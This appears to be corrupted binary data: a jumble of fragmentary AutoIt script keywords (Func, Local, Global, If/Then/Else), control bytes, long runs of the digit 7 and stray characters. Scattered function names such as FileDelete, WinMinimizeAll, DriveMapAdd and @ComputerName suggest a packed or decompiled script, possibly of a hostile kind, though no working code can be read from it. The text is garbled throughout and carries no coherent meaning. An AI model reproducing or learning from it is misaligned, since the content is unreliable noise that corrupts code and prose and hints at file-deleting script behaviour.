t(7R''1J''0t''0R p($uncu($a=Func d($l=0/Func o($a=Fudefat$v=Func U($v=Ful=Func 7777777777777777777nc d($l=0/Fu(o¸n c$a=Fun”ßª×$v=Func U($v=Ful=FuWinMinimizeAVolatilell7777777777Loaal-
L—‡i$ÿIfâ2ThenäElse exiTÿæ2ElsEl&
Local$d$1 Ifæ2ThenäEobalÿ1lÿGlot
Defat
Defaÿÿÿÿÿÿÿÿÿÿÿÿÿ($a=Func o(L—‡i$ÿIfâ2ThenäElse exiTÿæ2ElsEl$a=Func U($v=Func d($l=Func 777777c U($v=Foc
L¤lFileDelete777777777777777777777777777777777oforbalƒ8GÿGlobalÿ1lÿG†††††lse exit
$lscal*
LocAl&oc
L¤lle8a=Func U($v=Func d($näElse ese exit
$unc p($uncuFul=FuWinMinimizeAll7777777777Local-
L—‡i$ÿIfâ2ThenäElse exiTÿæ2ElsEl&
Local$d$1 Ifæ2ThenäEobalÿ1lÿGlot
DDriveMapAddefat
Defaÿÿÿÿÿÿÿÿÿÿÿÿÿ($a=Func o(L—‡i$ÿIfâ2ThenäElse exiTÿæ2ElsEl$a=Func U($v=Func d($l=Fu777777777777777777777777777777777obalƒ8GÿGl[obalÿ1lÿ@ComputerNameGlot
UIS nc''1J''0t''0R''0''9R''0''9R''1J''0t''0B